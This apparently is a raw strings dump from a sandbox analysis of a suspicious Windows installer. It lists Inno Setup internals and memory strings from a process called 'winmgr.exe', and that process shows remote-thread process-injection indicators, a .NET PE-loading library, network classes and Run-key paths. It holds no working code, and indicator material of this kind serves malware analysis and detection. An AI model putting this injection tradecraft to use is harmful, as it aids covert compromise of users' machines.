function RegDeleteKeyIfEmpty(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegKeyExists(const RootKey: Integer; const SubKeyName: String): Boolean;
function RegDeleteValue(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegGetSubkeyNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegGetValueNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegQueryDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultDWord: Cardinal): Boolean;
function RegQueryBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: AnsiString): Boolean;
function RegWriteStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteExpandStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: Cardinal): Boolean;
function RegWriteBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: AnsiString): Boolean;
function CheckForMutexes(Mutexes: String): Boolean;
function Exec(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ExecAsOriginalUser(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ShellExec(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function ShellExecAsOriginalUser(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function MakePendingFileRenameOperationsChecksum: String;
function CreateShellLink(const Filename, Description, ShortcutTo, Parameters, WorkingDir, IconFilename: String; const IconIndex, ShowCmd: Integer): String;
function ExitSetupMsgBox: Boolean;
function GetWindowsVersion: Cardinal;
procedure GetWindowsVersionEx(var Version: TWindowsVersion);
function GetWindowsVersionString: String;
function SuppressibleMsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons, Default: Integer): Integer;
function CustomMessage(const MsgName: String): String;
function SendMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Longint;
function PostMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendNotifyMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastMessage(const Msg, WParam, LParam: Longint): Longint;
function PostBroadcastMessage(const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastNotifyMessage(const Msg, WParam, LParam: Longint): Boolean;
procedure RaiseException(const Msg: String);
function SetPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
CREATEOUTPUTMSGPAGE
CREATEOUTPUTMSGMEMOPAGE
MSGBOX
INIKEYEXISTS
GETCMDTAIL
REGKEYEXISTS
REGDELETEKEYINCLUDINGSUBKEYS
REGDELETEKEYIFEMPTY
REGGETSUBKEYNAMES
CHECKFORMUTEXES
SHELLEXEC
SHELLEXECASORIGINALUSER
MAKEPENDINGFILERENAMEOPERATIONSCHECKSUM
EXITSETUPMSGBOX
GETWINDOWSVERSION
GETWINDOWSVERSIONSTRING
SUPPRESSIBLEMSGBOX
GetWindowsVersionEx
IMsgt
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Messages (5.5.3) (u)
oleaut32.dll
advapi32.dll
RegOpenKeyExW
RegCloseKey
user32.dll
GetKeyboardType
kernel32.dll
UnhookWindowsHookEx
SetWindowsHookExW
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjects
MapVirtualKeyW
LoadKeyboardLayoutW
GetKeyboardState
GetKeyboardLayoutNameW
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextW
ExitWindowsEx
EnumWindows
EnumThreadWindows
EnumChildWindows
ActivateKeyboardLayout
msimg32.dll
gdi32.dll
SetViewportOrgEx
version.dll
mpr.dll
TransactNamedPipe
SetNamedPipeHandleState
GetWindowsDirectoryW
GetCPInfo
CreateNamedPipeW
RegQueryInfoKeyW
RegFlushKey
RegEnumKeyExW
RegDeleteKeyW
RegCreateKeyExW
comctl32.dll
ole32.dll
shell32.dll
ShellExecuteExW
ShellExecuteW
comdlg32.dll
`.rdata
@.data
.pdata
COMCTL32.dll
SHLWAPI.dll
SetProcessShutdownParameters
KERNEL32.dll
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
KWindows
6MsgIDs
Msgs
UrlMon
.rsrc
@.reloc
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
shlwapi.dll
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\ProfileReconciliation
RegKey
GetWindowsDirectoryA
RegOpenKeyA
RegCreateKeyExA
SHFOLDER.dll
dll\shfolder.dbg
Font.Color
Font.Height
Font.Name
Font.Style
OnKeyDown
Lines.Strings
name="JR.Inno.Setup"
version="1.0.0.0"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
%s_%d
USER32.DLL
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
uxtheme.dll
DWMAPI.DLL
clWebSnow
clWebFloralWhite
clWebLavenderBlush
clWebOldLace
clWebIvory
clWebCornSilk
clWebBeige
clWebAntiqueWhite
clWebWheat
clWebAliceBlue
clWebGhostWhite
clWebLavender
clWebSeashell
clWebLightYellow
clWebPapayaWhip
clWebNavajoWhite
clWebMoccasin
clWebBurlywood
clWebAzure
clWebMintcream
clWebHoneydew
clWebLinen
clWebLemonChiffon
clWebBlanchedAlmond
clWebBisque
clWebPeachPuff
clWebTan
clWebYellow
clWebDarkOrange
clWebRed
clWebDarkRed
clWebMaroon
clWebIndianRed
clWebSalmon
clWebCoral
clWebGold
clWebTomato
clWebCrimson
clWebBrown
clWebChocolate
clWebSandyBrown
clWebLightSalmon
clWebLightCoral
clWebOrange
clWebOrangeRed
clWebFirebrick
clWebSaddleBrown
clWebSienna
clWebPeru
clWebDarkSalmon
clWebRosyBrown
clWebPaleGoldenrod
clWebLightGoldenrodYellow
clWebOlive
clWebForestGreen
clWebGreenYellow
clWebChartreuse
clWebLightGreen
clWebAquamarine
clWebSeaGreen
clWebGoldenRod
clWebKhaki
clWebOliveDrab
clWebGreen
clWebYellowGreen
clWebLawnGreen
clWebPaleGreen
clWebMediumAquamarine
clWebMediumSeaGreen
clWebDarkGoldenRod
clWebDarkKhaki
clWebDarkOliveGreen
clWebDarkgreen
clWebLimeGreen
clWebLime
clWebSpringGreen
clWebMediumSpringGreen
clWebDarkSeaGreen
clWebLightSeaGreen
clWebPaleTurquoise
clWebLightCyan
clWebLightBlue
clWebLightSkyBlue
clWebCornFlowerBlue
clWebDarkBlue
clWebIndigo
clWebMediumTurquoise
clWebTurquoise
clWebCyan
clWebPowderBlue
clWebSkyBlue
clWebRoyalBlue
clWebMediumBlue
clWebMidnightBlue
clWebDarkTurquoise
clWebCadetBlue
clWebDarkCyan
clWebTeal
clWebDeepskyBlue
clWebDodgerBlue
clWebBlue
clWebNavy
clWebDarkViolet
clWebDarkOrchid
clWebMagenta
clWebDarkMagenta
clWebMediumVioletRed
clWebPaleVioletRed
clWebBlueViolet
clWebMediumOrchid
clWebMediumPurple
clWebPurple
clWebDeepPink
clWebLightPink
clWebViolet
clWebOrchid
clWebPlum
clWebThistle
clWebHotPink
clWebPink
clWebLightSteelBlue
clWebMediumSlateBlue
clWebLightSlateGray
clWebWhite
clWebLightgrey
clWebGray
clWebSteelBlue
clWebSlateBlue
clWebSlateGray
clWebWhiteSmoke
clWebSilver
clWebDimGray
clWebMistyRose
clWebDarkSlateBlue
clWebDarkSlategray
clWebGainsboro
clWebDarkGray
clWebBlack
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
crSQLWait
%s (%s)
imm32.dll
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
RegDeleteKeyExW
.DEFAULT\Control Panel\International
%s, ClassID: %s
%s, ProgID: "%s"
oleacc.dll
MSFTEDIT.DLL
RICHED20.DLL
Rstrtmgr.dll
File I/O error %d
Messages file "%s" is missing. Please correct the problem or obtain a new copy of the program.
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
WININIT.INI
Software\Microsoft\Windows\CurrentVersion\SharedDLLs
RegCreateKeyEx
RegOpenKeyEx
sfc.dll
cmd.exe" /C "
COMMAND.COM" /C
PendingFileRenameOperations
PendingFileRenameOperations2
@Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows NT\CurrentVersion\Fonts
IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)
IPropertyStore::SetValue(PKEY_AppUserModel_ID)
IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)
IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)
OLEAUT32.DLL
Log opened. (Time zone: UTC%s%.2u:%.2u)
%s Log %s #%.3u.txt
regsvr32.exe"
Cannot register 64-bit DLLs on this version of Windows
HELPER_EXE_AMD64
Cannot utilize 64-bit features on this version of Windows
64-bit helper EXE wasn't extracted
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x
CreateNamedPipe
helper %d 0x%x
Helper process PID: %u
Stopping 64-bit helper process. (PID: %u)
Helper process exited with failure code: 0x%x
TransactNamedPipe/GetOverlappedResult
Helper: Command did not execute
SOFTWARE\Microsoft\.NETFramework
.NET Framework not found
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
v4.0.30319
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0
v2.0.50727
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1
v1.1.4322
.NET Framework version %s not found
Fusion.dll
Failed to load .NET Framework DLL "%s"
Failed to get address of .NET Framework CreateAssemblyCache function
.NET Framework CreateAssemblyCache function failed
MoveFileEx failed (%d).
Deleting directory: %s
Failed to delete directory (%d). Will retry later.
Failed to delete directory (%d). Will delete on restart (if empty).
Failed to delete directory (%d).
Deleting file: %s
Failed to delete the file; it may be in use (%d).
The file appears to be in use (%d). Will delete on restart.
Decrementing shared count (%d-bit): %s
Unregistering 64-bit DLL/OCX: %s
Unregistering 32-bit DLL/OCX: %s
Not unregistering DLL/OCX again: %s
Unregistering 64-bit type library: %s
Unregistering 32-bit type library: %s
Uninstalling from GAC: %s
Running Exec filename:
Running Exec parameters:
CreateProcess failed (%d).
Process exit code: %u
Running ShellExec filename:
Running ShellExec parameters:
ShellExecuteEx failed (%d).
Skipping RunOnceId "%s" filename: %s
Unregistering font: %s
zlib: Internal error. Code %d
bzlib: Internal error. Code %d
lzmadecomp: %s
lzmadecomp: Compressed data is corrupted (%d)
DecodeToBuf failed (%d)
c:\directory
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Could not find page with ID %d
Software\Microsoft\Windows\CurrentVersion\Uninstall
%s\%s_is1
RestartManager found an application using one of our files: %s
Can use RestartManager to avoid reboot? %s (%d)
PrepareToInstall failed: %s
Need to restart Windows? %s
/:*?"<>|
\/:*?"<>|
%s-%d.bin
%s-%d%s.bin
..\DISK%d\
Asking user for new disk containing "%s".
Cannot read an encrypted file before the key has been set
LoggedMsgBox returned an unexpected value. Assuming Abort.
Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows\CurrentVersion\Uninstall\
5.5.4 (u)
URLInfoAbout
URLUpdateInfo
Creating directory: %s
Setting permissions on directory: %s
Failed to set permissions on directory (%d).
Setting NTFS compression on directory: %s
Unsetting NTFS compression on directory: %s
Failed to set NTFS compression state (%d).
Failed to set value in Fonts registry key.
Failed to open Fonts registry key.
Setting permissions on file: %s
Failed to set permissions on file (%d).
Setting NTFS compression on file: %s
Unsetting NTFS compression on file: %s
Dest filename: %s
Dest file is protected by Windows File Protection.
Time stamp of our file: %s
Time stamp of existing file: %s
Version of our file: %u.%u.%u.%u
Version of existing file: %u.%u.%u.%u
Existing file is protected by Windows File Protection. Skipping.
Uninstaller requires administrator: %s
The existing file appears to be in use (%d). Will replace on restart.
The existing file appears to be in use (%d). Retrying.
Registering file as a font ("%s")
Cannot install files to 64-bit locations on this version of Windows
desktop.ini
.ShellClassInfo
{0AFACED1-E828-11D1-9187-B532F1E9575D}
target.lnk
Filename: %s
Desktop.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\
Setting permissions on registry key: %s\%s
Could not set permissions on the registry key because it currently does not exist.
Failed to set permissions on registry key (%d).
Cannot access 64-bit registry keys on this version of Windows
Registration executable created: %s
Software\Microsoft\Windows\CurrentVersion\RunOnce
Registering 64-bit DLL/OCX: %s
Registering 32-bit DLL/OCX: %s
Registering 64-bit type library: %s
Registering 32-bit type library: %s
Directory for uninstall files: %s
Will append to existing uninstall log: %s
Will overwrite existing uninstall log: %s
Creating new uninstall log: %s
LoggedMsgBox returned an unexpected value. Assuming Cancel.
RmShutdown returned an error: %d
Fatal exception during installation process (%s):
ExtractTemporaryFile: The file "%s" was not found
ExtractTemporaryFiles: No files matching "%s" found
Invalid symbol '%s' found
Invalid token '%s' found
QuerySpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected status: %d
ShellExecuteEx
ShellExecuteEx returned hProcess=0
Wnd=$%x
Expression error '%s'
Password
SuppressMsgBoxes
srcexe
Cannot evaluate "%s" constant during Uninstall
Cannot access a 64-bit key in a "reg" constant on this version of Windows
Unknown custom message name "%s" in "cm" constant
Cannot expand "pf64" constant on this version of Windows
Cannot expand "cf64" constant on this version of Windows
uninstallexe
Cannot expand "dotnet2064" constant on this version of Windows
Cannot expand "dotnet4064" constant on this version of Windows
Failed to expand shell folder constant "%s"
Unknown constant "%s"
Software\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
cmd.exe
COMMAND.COM
\_setup64.tmp
_isetup\_shfoldr.dll
Failed to get version numbers of _shfoldr.dll
shfolder.dll
Failed to load DLL "%s"
Found pending rename or delete that matches one of our files: %s
Windows version: %u.%u.%u%s (NT platform: %s)
64-bit Windows: %s
Processor architecture: %s
Defaulting to %s for suppressed message box (%s):
Message box (%s):
User chose %s.
MsgBox failed.
/SPAWNWND=$%x /NOTIFYWND=$%x
64-bit install mode: %s
_isetup\_isdecmp.dll
_isetup\_iscrypt.dll
/Password=
/SuppressMsgBoxes
/DETACHEDMSG
-0.bin
Setup version: Inno Setup version 5.5.4 (u)
Original Setup EXE:
Not restarting Windows because Setup is being run from the debugger.
Restarting Windows.
Inno Setup version 5.5.4 (u)
Portions Copyright (C) 2000-2013 Martijn Laan
hXXp://VVV.innosetup.com/
hXXp://VVV.remobjects.com/ps
Cannot run files in 64-bit locations on this version of Windows
Type: Exec
Type: ShellExec
RmRestart returned an error: %d
Need to restart Windows, not attempting to restart applications
Will not restart Windows automatically.
RegDeleteKeyExA
System\CurrentControlSet\Control\Windows
Cannot call "%s" function during Setup
Cannot call "%s" function during Uninstall
Invalid RootKey value
Unknown custom message name "%s"
%u.%.2u.%u
%u.%u.%u.%u
Cannot disable FS redirection on this version of Windows
Runtime Error (at %d:%d):
Exception "%s" at address %p
TScriptRunner.SetPSExecParameters: Invalid type
TScriptRunner.LoadScript failed
Remove shared file %s? User chose %s%s
/INITPROCWND=$%x
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x
Original Uninstall EXE:
Install was done in 64-bit mode but not running 64-bit Windows now
Removed all? %s
Not restarting Windows because Uninstall is being run from the debugger.
isRS-???.tmp
isRS-%.3u.tmp
DisableProcessWindowsGhosting
Interface not supported
7Dispatch methods do not support more than 64 parameters
Exception: %s
Cannot Import %s
Unable to insert a line Clipboard does not support Icons
Text exceeds memo capacity/Menu '%s' is already being used by another form
- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.
Error setting %s.Count8Listbox (%s) style must be virtual in order to set Count
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
No help found for %s
Unsupported clipboard format
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread$No help viewer that supports filters#''%s'' is not a valid integer value
Cannot open file "%s". %s
Invalid file name - %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Resource %s not found"Character index out of bounds (%d)
Start index out of bounds (%d)
Invalid count (%d)
Invalid destination index (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Object lock not owned(Monitor support function not initialized
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation
n%USERPROFILE%
r%SYSTEMROOT%
5.50.4807.2300
Microsoft(R) Windows (R) 2000 Operating System
Datos de programa%Configuraci
51.1052.0.0

winmgr.exe_2040_rwx_00400000_0003E000:

.text
`.rsrc
@.reloc
-3.VX 
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
%X4xF-}0j
,&<;!0';49&
"!7$3
?5$9"
."/56*'?
5))-:8)9
"Y.yMN
;1 ,6'0,#.1
8 81`40-8/.23<)8 |
0 -8<!'&
)$!,)<!'&
.zym_
U@RJJHMM!.G!.HL!vrbshqu/dyd
??7<5~3?=1%
,:&<;*,:
Jk.WP
\"1&'=;:
v2.0.50727
System.Drawing
System.Windows.Forms
Microsoft.Win32
RegistryKey
Microsoft.VisualBasic
Microsoft.VisualBasic.CompilerServices
System.IO
System.Management
Operators
WebClient
System.Net
System.Text
System.ComponentModel
System.Security.AccessControl
System.Timers
System.Threading
System.Diagnostics
Microsoft.VisualBasic.Devices
Microsoft.VisualBasic.MyServices
ProcessWindowStyle
System.Runtime.InteropServices
System.Collections
System.Runtime.CompilerServices
System.Net.Sockets
System.Resources
System.Globalization
System.Security.Cryptography
System.Security.Principal
WindowsIdentity
WindowsPrincipal
WindowsBuiltInRole
System.Reflection
WebRequest
WebResponse
System.Text.RegularExpressions
Microsoft.VisualBasic.ApplicationServices
System.Reflection.Emit
System.Configuration
System.Runtime.Serialization.Formatters.Binary
System.Collections.Generic
NotSupportedException
InvalidOperationException
.ctor
OpenSubKey
set_WindowStyle
get_ExecutablePath
set_Key
CreateSubKey
GetExecutingAssembly
set_UseShellExecute
Join
a.exe
kernel32.dll
user32.dll
Crypt32.dll
advapi32.dll
wintrust.dll
.cctor
System.Object.Finalize
System.Windows.Forms.Form.Dispose
System.Object.Equals
System.Object.GetHashCode
System.Object.ToString
portableExecutable_0
PortableExecutable
JLibrary.PortableExecutable
EnumImports
System.Collections.Generic.IEnumerable<JLibrary.PortableExecutable.IMAGE_SECTION_HEADER>.GetEnumerator
System.Collections.IEnumerable.GetEnumerator
System.Collections.Generic.IEnumerator<JLibrary.PortableExecutable.IMAGE_SECTION_HEADER>.get_Current
System.Collections.IEnumerator.Reset
System.IDisposable.Dispose
System.Collections.IEnumerator.get_Current
System.Collections.Generic.IEnumerator<JLibrary.PortableExecutable.IMAGE_SECTION_HEADER>.Current
System.Collections.IEnumerator.Current
<EnumImports>d__8
System.Collections.Generic.IEnumerable<JLibrary.PortableExecutable.IMAGE_IMPORT_DESCRIPTOR>.GetEnumerator
System.Collections.Generic.IEnumerator<JLibrary.PortableExecutable.IMAGE_IMPORT_DESCRIPTOR>.get_Current
System.Collections.Generic.IEnumerator<JLibrary.PortableExecutable.IMAGE_IMPORT_DESCRIPTOR>.Current
JLibrary.Tools
MajorOperatingSystemVersion
MinorOperatingSystemVersion
IMAGE_IMPORT_DESCRIPTOR
a.Resources.resources
a.Base.resources
1.0.0.0
$cf9b87da-47a8-4503-b119-bbe09e7c36a9
_CorExeMain
mscoree.dll
_2342342353245
a, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
Image contains a CLR runtime header. Currently only native binaries are supported; no .NET dependent libraries.
File is of the PE32  format. Currently support only extends to PE32 images. Either recompile the binary as x86, or choose a different target.
Module's entry point function reported a failure
Entry method of module reported a failure
Unable to locate imported function '{0}' from module '{1}' in the remote process.
.manifest
KERNEL32.dll
Error occurred while executing remote thread.
a.Resources
a.Base

DW20.EXE_1836:

.text
`.data
.cdata
.rsrc
watson.microsoft.com
.mdmp
%s?szAppName=%S&szAppVer=%S&szAppStamp=%S&szModName=%S&szModVer=%S&szModStamp=%S&fDebug=%S&offset=%S
/dw/stagetwo.asp
%s/%S/%S/%S/%S/%S/%S/%S/%S.htm
Failed to fill report params from generic params
Not offering reporting
%s Mode
Failed to get a reporting destination
Nothing to report from queue
No reports left to send. Removing queue triggers and bailing.
Failed to plug UI; LCID=%u
Ignoring %S due to unknown queue version
Reporting is disabled
SignOff queue reporting is disabled
Queued Reporting Mode called but still want to report to the queue
Bad queue type to report from
No reports for given queue mask - %u
Invalid queue mask - %u
Suspending: Force cancel to queued reporting
Suspending: Force cancel to network reporting
CreateWindowExA failed with %d.
Application Error Reporting %d
WatsonQueuedReportingInstanceVerification
riched20.dll
qMicrosoft\PCHealth\ErrorReporting\DW
msaccess.exe
hXXp://watson.microsoft.com/dw/dcp.asp
hXXp://watson.microsoft.com/dw/watsoninfo.asp
dwintl20.dll
Launching lightweight browser with URL
mshtml.dll
Not reporting
Reporting
DWBypassQueue
DWExplainerURL
DWNoSignOffQueueReporting
DWAlwaysReport
DWReporteeName
DWURLLaunch
DWNoExternalURL
DWStressReport
ole32.dll
imm32.dll
BTLog.dll
Microsoft\PCHealth\ErrorReporting\DW
HKLM\Software\Microsoft\Windows NT\CurrentVersion\AeDebug\Debugger
hXXp://
hXXps://
Software\Microsoft\PCHealth\ErrorReporting\DW\Debug
%s\%s
https
DwBTLog.log
Failed to get minidump for %S!
szAppName=%s
szAppVer=%d.%d.%d.%d
szAppStamp=x
szModName=%s
szModVer=%d.%d.%d.%d
szModStamp=x
fDebug=%s
offset=x
microsoft.com
.msn.com
.microsoft.com
d:d:d d-d-d
/dw/generictwo.asp
kernel32.dll
psapi.dll
mso.dll
MsoDWRecover%x
MsoDWHang%x
Launching browser with URL
shell32.dll
%d.%d.%d.%d
%d.%d.%d.%d.x.%d.%d
shfolder.dll
unknown.sig
%s dw20.exe %d.%d.%d.%d
RegKey=
ResponseURL=
URLLaunch=
NoExternalURL=
%s:(%s) XX
%s:(%s) X
%s:(%s)
%s:(%s) %s
registry.txt
wql.txt
Windows NT Version %d.%d Build: %d
Stage 1 server response: %s
Stage 2 server response: %s
Stage 4 server response: %s
StatusCode: %d
Opening server: %s
HttpOpen failed.
Opening %s Request:
HTTPS
HttpSend Failed.
HttpWrite Failed, GLE=%d.
HttpEndReq failed.
Count filename length greater than MAX_PATH, can't report.
Filesystem reporting: count file updated
FReportToQueue: GetLastError=%u
FReportToQueue: File Tree Root does not exist: %S
Failed to add heap file to cab: %S
memory.dmp
mdmpmem.hdmp
version.txt
Network reporting complete.
Network reporting failed.
Application Error Reporting Transfer %d
Filesystem reporting complete
Filesystem reporting: cab successfully written
Filesystem reporting: could not find/create directory for cab/count
Filesystem reporting: redirection failure, too many redirects
Filesystem reporting: redirection failure, no previous roots
Filesystem reporting: improper file tree root
Filesystem reporting cancelled
Filesystem reporting: file tree root is too long
Record: 0xxx
Address: 0xxx
Code: 0xx
Flags: 0xx
x:x
(%d.%d:%d.%d)
Checksum: 0xx
Time Stamp: 0xx
Image Base: 0xx
Image Size: 0xx
Module %d
Windows NT %d.%d Build: %d
CPU AMD Feature Code: X
CPU Version: X CPU Feature Code: X
CPU Vendor Code: X - X - X
0xx:
0xx: x x x x
EFlags: 0xx ESP: 0xx SegSs: 0xx
EIP: 0xx EBP: 0xx SegCs: 0xx
EBX: 0xx ECX: 0xx EDX: 0xx
EDI: 0xx ESI: 0xx EAX: 0xx
Thread ID: 0xx
Thread %d
Memory Range %d
Software\Microsoft\PCHealth\ErrorReporting\DW
OkToReportFromTheseQueues
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Failed to obtain queue mutex. GetLastError=%u
FGetQueueMutex: WaitForSingleObject returned %u
Failed to open or create queue mutex. GetLastError=%u
Failed queued reporting pester check
Failed to create run reg key
Persistent run key is set.
CoInitializeEx() returned 0x%x.
Reporting to Admin Queue
Reporting to Regular Queue
Reporting to SignOff Queue
Reporting to Headless Queue
Reporting from Regular Queue
Reporting from SignOff Queue
Reporting from Headless Queue
OOM Failed to alloc QueuedReportData
FAllocSD: GetLastError=%u
%s%s%s
FEnsureQueueDirW: GetLastError=%u
Failed to write snt. GLE: %u
Failed to create snt. GLE: %u
Failed to set info; bad queue type: %u
Failed to open reg key for queue
Failed to get windows folder path for queue: %u
Failed to move instr file from queue A to queue B - %u
Failed to move cab file from queue A to queue B - %u
Did not move any reports from admin q to user q
Did not move any reports from user q to headless q
Queue types that have reports: %u
Setting triggerAtConnectionMade to: %u
Setting triggerAtLogon to: %u
Setting the queue trigger based upon: %u
SUCCESS adding report to queue
Launched (%S)
Failed to store the SensSubscription. hr: %d
failed to allocate PROGID string: %S
Failed putting SubscriberInterface. hr: %d
Failed putting PerUser. hr: %d
Failed putting Enabled. hr: %d
Failed putting MachineName. hr: %d
Failed putting OwnerSID. hr: %d
Failed putting Description. hr: %d
Failed putting InterfaceID. hr: %d
Failed putting EventClassID. hr: %d
Failed putting MethodName. hr: %d
Failed putting SubscriptionName. hr: %d
Failed putting PublisherID. hr: %d
Failed putting SubscriberCLSID. hr: %d
Failed putting SubscriptionID. hr: %d
Failed CoCreateInstance on EventSubscription. hr: %d
Failed to remove the SensSubscription. hr: %d
failed to allocate query string: %S
Failed CoCreateInstance on EventSystem. hr: %d
SENS: StringFromIID() returned <%x>
DWSHARED: SysAllocString(%s) failed!
Failed to subscribe subscription %u. hr: %d
Failed to get data for subscription %u. hr: %d
Failed to query install reg key
Failed to open install reg key
Software\Microsoft\PCHealth\ErrorReporting\DW\Installed
HKEY_USERS\
HKEY_CURRENT_CONFIG\
HKEY_CLASSES_ROOT\
HKEY_LOCAL_MACHINE\
HKEY_CURRENT_USER\
initing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
freeing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
0addref CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
QIing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
releasing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
deleting CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
creating CDwAccessible: hwnd %x, idc %d
WriteAtOffset.Write(0x%x) failed, 0xx
WriteAtOffset.Seek(0x%x) failed, 0xx
WriteMemoryFromProcess.Read(0x%I64x, 0x%x) failed, 0xx
WriteStringToPool.Write(0x%x) failed, 0xx
WriteFunctionTable.RawEntries.Write(0x%x) failed, 0xx
WriteFunctionTable.RawTable.Write(0x%x) failed, 0xx
WriteFunctionTableList.DumpTable.Write(0x%x) failed, 0xx
WriteFunctionTableList.Seek(0x%x) failed, 0xx
WriteDirectoryEntry.Write(0x%x) failed, 0xx
Thread(0x%x) callback returned FALSE
WriteSystemInfo.GetOsCsdString failed, 0xx
WriteSystemInfo.GetCpuInfo failed, 0xx
CalculateSizeForSystemInfo.GetOsCsdString failed, 0xx
WriteHeader.GetCurrentTimeDate failed, 0xx
WriteDirectoryTable.Seek(0x%x) failed, 0xx
WriteMemoryInfo.Write(0x%x) failed, 0xx
WriteMemoryInfo.QueryVirtual(0x%I64x) failed, 0xx
WriteFullMemory virtual memory layout changed, retries %d, 0x%I64x (0x%I64x:0x%I64x) vs. 0x%I64x (0x%I64x:0x%I64x)
WriteFullMemory.Memory.Write(0x%x) failed, 0xx
WriteFullMemory.Memory.Read(0x%I64x, 0x%x) failed, retries %d, 0xx
WriteFullMemory.QueryVirtual(0x%I64x) for data failed, 0xx
